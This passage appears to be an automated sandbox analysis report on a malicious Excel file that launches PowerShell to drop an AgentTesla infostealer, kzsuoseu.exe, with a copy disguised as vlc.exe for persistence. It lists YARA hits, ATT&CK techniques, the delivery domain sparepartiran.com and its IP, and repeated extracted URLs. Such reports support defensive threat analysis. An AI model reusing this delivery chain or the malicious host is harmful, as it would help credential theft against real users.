                Source: Yara matchFile source: 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.510414491.00000000031C1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.511341965.00000000032E6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.509988103.0000000004491000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 4980, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 340, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 2908, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 1276, type: MEMORY
                Source: Yara matchFile source: 30.2.kzsuoseu.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.kzsuoseu.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 2908, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 1276, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.510414491.00000000031C1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.511341965.00000000032E6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.509988103.0000000004491000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 4980, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 340, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 2908, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzsuoseu.exe PID: 1276, type: MEMORY
                Source: Yara matchFile source: 30.2.kzsuoseu.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.kzsuoseu.exe.400000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation111Registry Run Keys / Startup Folder11Process Injection112Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting2Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsPowerShell3Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information21Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 324119 Sample: x2hGv.xls Startdate: 28/11/2020 Architecture: WINDOWS Score: 100 39 g.msn.com 2->39 51 Multi AV Scanner detection for domain / URL 2->51 53 Multi AV Scanner detection for dropped file 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 10 other signatures 2->57 8 powershell.exe 14 20 2->8         started        13 powershell.exe 21 2->13         started        15 EXCEL.EXE 34 22 2->15         started        signatures3 process4 dnsIp5 41 sparepartiran.com 162.223.88.131, 49737, 49738, 80 COLOUPUS United States 8->41 43 192.168.2.1 unknown unknown 8->43 37 C:\Users\Public\kzsuoseu.exe, PE32 8->37 dropped 59 Drops PE files to the user root directory 8->59 61 Powershell drops PE file 8->61 17 kzsuoseu.exe 4 8->17         started        20 conhost.exe 8->20         started        22 kzsuoseu.exe 1 5 13->22         started        25 conhost.exe 13->25         started        27 splwow64.exe 15->27         started        file6 signatures7 process8 file9 45 Multi AV Scanner detection for dropped file 17->45 47 Machine Learning detection for dropped file 17->47 49 Injects a PE file into a foreign processes 17->49 29 kzsuoseu.exe 17->29         started        31 kzsuoseu.exe 17->31         started        35 C:\Users\user\AppData\Roaming\...\vlc.exe, PE32 22->35 dropped 33 kzsuoseu.exe 22->33         started        signatures10 process11

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                x2hGv.xls23%ReversingLabsDocument-Office.Trojan.Heuristic

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%Joe Sandbox ML
                C:\Users\Public\kzsuoseu.exe100%Joe Sandbox ML
                C:\Users\Public\kzsuoseu.exe24%MetadefenderBrowse
                C:\Users\Public\kzsuoseu.exe55%ReversingLabsByteCode-MSIL.Infostealer.Maslog
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe24%MetadefenderBrowse
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe55%ReversingLabsByteCode-MSIL.Infostealer.Maslog

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                32.2.kzsuoseu.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                30.2.kzsuoseu.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                Domains

                SourceDetectionScannerLabelLink
                sparepartiran.com11%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
                https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://officeci.azurewebsites.net/api/0%VirustotalBrowse
                https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                http://www.galapagosdesign.com/0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                http://www.fontbureau.come.comk0%Avira URL Cloudsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                sparepartiran.com
                162.223.88.131
                truetrueunknown
                g.msn.com
                unknown
                unknownfalse
                  high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.diagnosticssdf.office.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                    high
                    http://127.0.0.1:HTTP/1.1kzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    https://login.microsoftonline.com/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                      high
                      https://shell.suite.office.com:1443915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                        high
                        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                          high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                            high
                            https://cdn.entity.915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://api.addins.omex.office.net/appinfo/query915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                              high
                              https://wus2-000.contentsync.915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://clients.config.office.net/user/v1.0/tenantassociationkey915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                high
                                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                  high
                                  https://powerlift.acompli.net915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://rpsticket.partnerservices.getmicrosoftkey.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://discord.com/vlc.exe.28.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://lookup.onenote.com/lookup/geolocation/v1915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                    high
                                    https://cortana.ai915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designerskzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000003.473687241.000000000640B000.00000004.00000001.sdmpfalse
                                      high
                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                        high
                                        https://cloudfiles.onenote.com/upload.aspx915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                          high
                                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                            high
                                            https://entitlement.diagnosticssdf.office.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                              high
                                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                high
                                                https://api.aadrm.com/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.sajatypeworks.comkzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://ofcrecsvcapi-int.azurewebsites.net/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.founder.com.cn/cn/cThekzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                  high
                                                  https://api.microsoftstream.com/api/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                    high
                                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                      high
                                                      https://cr.office.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000015.00000002.476805076.000001F1BA660000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.galapagosdesign.com/DPleasekzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.urwpp.deDPleasekzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cnkzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://portal.office.com/account/?ref=ClientMeControl915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000015.00000002.457583835.000001F1AA601000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.459466804.0000022B80001000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://ecs.office.com/config/v2/Office915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                high
                                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipkzsuoseu.exe, 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://graph.ppe.windows.net915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                  high
                                                                  https://res.getmicrosoftkey.com/api/redemptionevents915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://powerlift-frontdesk.acompli.net915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://tasks.office.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                    high
                                                                    https://officeci.azurewebsites.net/api/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                      high
                                                                      http://www.galapagosdesign.com/kzsuoseu.exe, 0000001C.00000003.470620927.000000000640B000.00000004.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://store.office.cn/addinstemplate915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlekzsuoseu.exe, 0000001C.00000003.467671944.0000000006423000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://wus2-000.pagecontentsync.915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hakzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://go.micropowershell.exe, 00000016.00000002.480623609.0000022B81CA4000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                            high
                                                                            https://globaldisco.crm.dynamics.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                              high
                                                                              http://www.fontbureau.come.comkkzsuoseu.exe, 0000001A.00000002.509575861.00000000018A7000.00000004.00000040.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://contoso.com/Iconpowershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                high
                                                                                https://store.officeppe.com/addinstemplate915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://dev0-api.acompli.net/autodetect915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.odwebp.svc.ms915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://api.powerbi.com/v1.0/myorg/groups915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                  high
                                                                                  https://web.microsoftstream.com/video/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                    high
                                                                                    http://www.galapagosdesign.com/staff/dennis.htmokzsuoseu.exe, 0000001C.00000003.470534192.000000000641F000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://graph.windows.net915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                      high
                                                                                      https://dataservice.o365filtering.com/915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://officesetup.getmicrosoftkey.com915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://analysis.windows.net/powerbi/api915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                          high
                                                                                          http://www.carterandcone.comlkzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://prod-global-autodetect.acompli.net/autodetect915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.fontbureau.com/designers/frere-jones.htmlkzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpfalse
                                                                                            high
